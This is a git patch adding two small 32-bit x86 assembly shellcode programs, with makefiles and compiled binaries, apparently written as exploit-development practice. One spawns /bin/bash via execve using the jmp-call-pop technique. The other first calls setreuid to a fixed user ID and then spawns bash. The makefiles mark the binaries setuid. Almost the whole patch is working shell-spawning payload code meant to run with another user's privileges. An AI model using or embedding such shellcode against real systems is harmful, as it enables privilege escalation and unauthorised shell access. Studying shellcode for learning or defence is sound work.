From 0c7b4ed75157aa9d781e4eec92a0a604c4c45c9c Mon Sep 17 00:00:00 2001
From: Brett Weiland <techcrazybsw@gmail.com>
Date: Fri, 20 Nov 2020 17:57:20 -0600
Subject: [PATCH] 	new file:   exec_cmd/makefile 	new file:  
 exec_cmd/shell 	new file:   exec_cmd/shell.asm 	new file:  
 exec_cmd/shell.o 	new file:   exec_cmd_setuid/makefile 	new file:  
 exec_cmd_setuid/shell 	new file:   exec_cmd_setuid/shell.asm 	new file:  
 exec_cmd_setuid/shell.o

---
 exec_cmd/makefile         |   5 +++++
 exec_cmd/shell            | Bin 0 -> 4268 bytes
 exec_cmd/shell.asm        |  19 +++++++++++++++++++
 exec_cmd/shell.o          | Bin 0 -> 528 bytes
 exec_cmd_setuid/makefile  |   5 +++++
 exec_cmd_setuid/shell     | Bin 0 -> 4288 bytes
 exec_cmd_setuid/shell.asm |  28 ++++++++++++++++++++++++++++
 exec_cmd_setuid/shell.o   | Bin 0 -> 592 bytes
 8 files changed, 57 insertions(+)
 create mode 100644 exec_cmd/makefile
 create mode 100755 exec_cmd/shell
 create mode 100644 exec_cmd/shell.asm
 create mode 100644 exec_cmd/shell.o
 create mode 100644 exec_cmd_setuid/makefile
 create mode 100755 exec_cmd_setuid/shell
 create mode 100644 exec_cmd_setuid/shell.asm
 create mode 100644 exec_cmd_setuid/shell.o

diff --git a/exec_cmd/makefile b/exec_cmd/makefile
new file mode 100644
index 0000000..676ee34
--- /dev/null
+++ b/exec_cmd/makefile
@@ -0,0 +1,5 @@
+make:
+	nasm shell.asm -felf32 -o shell.o
+	ld -m elf_i386 shell.o -o shell -s
+	chmod u+s shell
+
diff --git a/exec_cmd/shell b/exec_cmd/shell
new file mode 100755
index 0000000000000000000000000000000000000000..9ea0d3b1ae343d767ca7c9dd05979479da3a3592
GIT binary patch
literal 4268
zcmb<-^>JflWMqH=CI)5(FmD12hY3*7L;xaV!l1yw#GnC`WrE0qgd12mK)3|R1Ys7C
z7*IV}KS&?Y3=mcVGC`OXh(YqBU^E0qLtr!nMnhmU1V%$(Gz3ONU^E0qLtr!nMnhmU
z1V%%Ez9H~h$nb#SZNrmMolaaExH~T!UOL<G;^qJU|MinH^YoJvi!&JXiZhB!ib@ib
z81za~D?lB6A^|s09cV0o4Wu44769z~gT?`105%i=Qo{@r1ky@C2|*-2csv2f2LQe=
B9{&IU

literal 0
HcmV?d00001

diff --git a/exec_cmd/shell.asm b/exec_cmd/shell.asm
new file mode 100644
index 0000000..d90d9a4
--- /dev/null
+++ b/exec_cmd/shell.asm
@@ -0,0 +1,19 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, edx
+xor edx, edx
+int 0x80
+
+
+data:
+call exploit 
+cmd: db '/bin/bash'
diff --git a/exec_cmd/shell.o b/exec_cmd/shell.o
new file mode 100644
index 0000000000000000000000000000000000000000..50283e1365323895349d9c72969e80770c1026db
GIT binary patch
literal 528
zcmb<-^>JflWMqH=Mh0dE1doBi0V-hvrZpH?8JJ*7Nuoh!f-oCYmjIBXgk*vMl+6yL
znUTaDfa(;H_#iVtKoE$LT~Yv)C;*DF05Ql85DhX@5{Qw_djM3Y3>1R_n0YY%Yazn}
zhPMq*Ms+%IZQ$;_Y<THx!;6>y|Nqxd%FNSGN-WNRsf5ycC8-r940^>G#U({0iAg|K
zWiEt<@X?f`bCK<5VfgqTSsoM<LO=n8KN%UMfP4|SB1Q&zARFXI2w-I3hB1M(04T(Z
oGg5PM^b(768RCme5{pV0QY#8_@-s^qQW8rN8Ip5TkTd|901<32`v3p{

literal 0
HcmV?d00001

diff --git a/exec_cmd_setuid/makefile b/exec_cmd_setuid/makefile
new file mode 100644
index 0000000..676ee34
--- /dev/null
+++ b/exec_cmd_setuid/makefile
@@ -0,0 +1,5 @@
+make:
+	nasm shell.asm -felf32 -o shell.o
+	ld -m elf_i386 shell.o -o shell -s
+	chmod u+s shell
+
diff --git a/exec_cmd_setuid/shell b/exec_cmd_setuid/shell
new file mode 100755
index 0000000000000000000000000000000000000000..9a98c4f3826d791d827773fd37a03d052e936369
GIT binary patch
literal 4288
zcmb<-^>JflWMqH=CI)5(FmD12hY3*7LjWRU!l1yw#GnC`WrE0qgd12mK)3|R1Ys7C
z7*IV}KS&?Y3=lR4GC`OXh(YqBU^E0qLtr!nMnhmU1V%$(Gz3ONU^E0qLtr!nMnhmU
z1V%%Ez9H~h-SCp(0mIvdCpVl<+r8B+ZRb|AvkefDs7@!Y4cxo+fL-{r4KJ?z|Nmb<
zDKk$$DX}<%L9aNYxTL5gF^NI1B((z6`zH=?1C@cs2iQQ$LE{6!@c_`+01Uu}2S93=
SVS+%~94H}(#0QTt0QmrHoGE1h

literal 0
HcmV?d00001

diff --git a/exec_cmd_setuid/shell.asm b/exec_cmd_setuid/shell.asm
new file mode 100644
index 0000000..504685f
--- /dev/null
+++ b/exec_cmd_setuid/shell.asm
@@ -0,0 +1,28 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+
+xor edx, edx
+
+xor eax, eax ; set reuid
+xor ebx, ebx
+xor ecx, ecx
+mov al, 203
+mov bx, 14005 
+mov cx, 14005
+int 0x80
+
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, cmd
+int 0x80
+
+data:
+call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start 
+cmd: db '/bin/bash'
diff --git a/exec_cmd_setuid/shell.o b/exec_cmd_setuid/shell.o
new file mode 100644
index 0000000000000000000000000000000000000000..59be32714228dab7d9729a24b586cf650ba3a6e3
GIT binary patch
literal 592
zcmb<-^>JflWMqH=Mh0dE1doBi0V-hvrZpJY7?@y6Nuoh!f-oCYmjRGtj%0!Wl+6yL
znUTZ`fa<i7_#iVtKoE$LU9tcuQ2-QU0b-CHAR1(*BoHH;Cjiu>3>1R_n0bmo0Zy18
zkahs7;{ehiy&yFp^FaL9>V}sL4;bDyJh|a?+U~7pX*;)?oo#@KM0GlGZQ$Om2UK>p
z;l-8z|NrYJW#;K8B^GA@g`hyMB(<W1L9aNYxTL5gF$u`3%!SZUeo<-;L=8*_3Jr5F
zNRWl$<9}pHP|OJd1rXuF$RGveYr+*VGROnjAO}JKBLg>#38V!;J}u5j&B@VAEY4+!
lFD^+eDq%>iD9FjrEMZ7VEJ<WY&P_qm0Azx~k`ZAc0{|(7J!Sv^

literal 0
HcmV?d00001